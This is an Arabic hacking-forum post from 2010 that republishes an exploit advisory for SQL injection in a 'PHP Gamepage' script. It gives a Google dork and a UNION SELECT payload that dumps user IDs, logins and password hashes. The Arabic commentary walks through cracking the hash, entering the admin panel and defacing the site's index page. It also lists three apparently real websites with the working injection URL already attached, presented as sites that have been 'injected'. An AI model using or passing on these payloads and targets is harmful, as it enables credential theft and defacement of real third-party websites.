التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-17-2010, 10:30 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Jaguar.PS
 

 

 
إحصائية العضو







Jaguar.PS غير متواجد حالياً

إرسال رسالة عبر MSN إلى Jaguar.PS

 

 

إحصائية الترشيح

عدد النقاط : 10
Jaguar.PS is on a distinguished road

افتراضي [ثغرة]~> بتاريخ 17/5/2010 (بتاريخ اليوم) SQL ++ مواقع محقونة .. الحق


الثـغرهـ

كود:
# Title: PHP Gamepage SQL Injection Vulnerability 
  # EDB-ID: 12634 
# CVE-ID: () 
# OSVDB-ID: () 
# Author: v4lc0m87  
# Published: 2010-05-17 
# Verified: yes 
# Download Exploit Code
# Download N/A
 
 view source
print?

*************************************************************************
 ,                               
 |       ,---. ,   . |---. ,---. ,---.   ,---. ,---. ,---. ,   .   ,
 |  ---  |     |   | |   | |---' |       |     |     |---' |   |   |
 |       `---' `---| `---' `---' `       `---' `     `---' `---`---
 `             `---'                                                   
*************************************************************************
[V] PHP Gamepage SQL Injection Vulnerability
 
            --==[ Author ]==--
[+] Author  : v4lc0m87
[+] Contact : valcom87[at]gmail[dot]com
[+] Group   : INDONESIAN CYBER
[+] Site    : http://indonesian-cyber.org/
[+] Date    : May, 17-2010 [INDONESIA]
 
*************************************************************************
            --==[ Details ]==--
 
[+] Vulnerable  : SQL Injection
[+] Google Dork : inurl:index.php?title=gamepage
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
[-] Exploit:
[+] -111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
 
[-] Remote SQLi p0c:
[+] http://127.0.0.1/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
     
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | TECON-CREW.ORG
 
[V] thx to:
SaruKusai (putus nyambung terus,hahha) MarilynMesum (smoga jadi bassis terbaik)
Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
Bocah tua nakal (mbah l4mpor,awchoy)
flyff666 cruz3N petimati spykit v3n0m uzanc
kokoh wisdom (program jadi rokok 3 slop marlboro menthol wkwkwkwk)
blue screen, skutengboy (kalian pasangan yg serasi, jikakakakakk)
[K]urabu[S]aru [RnR] cO2 community
and y0u !!
شرح الثغرهـ

نسحب الدورك من اجريه :00001867[1]:
ونرميه عند عمنا جوجل :a43:
الدورك
inurl:index.php?title=gamepage

تيجيك مواقع قد شعر راسك ..

نروح على موقع ونخلي الرابط هيكـ ..
http://XXX.XX/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0 ,0,0,0,0,0,0+from+cw2_user--

يجينا الباس مشفر , روح فكه وانت تضحك smilies8 < تنساش تضحك :dd:

وروح على مسار لوحة التحكم يلي هي ..
http://XXX.XX/admin

وسلامتك ما احلى بجامتك ,
تنسوناش بالإندكس

مواقع محقونة ..

كود PHP:
http://www.city-interactive.info/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws%280x3a,id,login,pass%29v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

http://city-interactive.com.pl/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws%280x3a,id,login,pass%29v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

http://www.city-interactive-games.biz/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws%280x3a,id,login,pass%29v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user-- 


سلآلآم



FeyvmDZ> fjhvdo 17L5L2010 (fjhvdo hgd,l) SQL ++ l,hru lpr,km >> hgpr

التوقيع

 


التعديل الأخير تم بواسطة Jaguar.PS ; 05-17-2010 الساعة 10:32 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة كوكيز بتاريخ اليوم 28/07/2010 (AV Arcade v3 ****** Authentication Bypass) alaacol قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 3 03-22-2015 01:58 PM
ثغرة جديدة من فرن فولكانو بتاريخ اليوم Black-FoG قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 18 01-01-2015 02:40 AM
ثغرة بتاريخ 24/03/2010 و مواقع و باسات هدية Zero قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 9 03-28-2010 01:27 AM


الساعة الآن 11:38 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0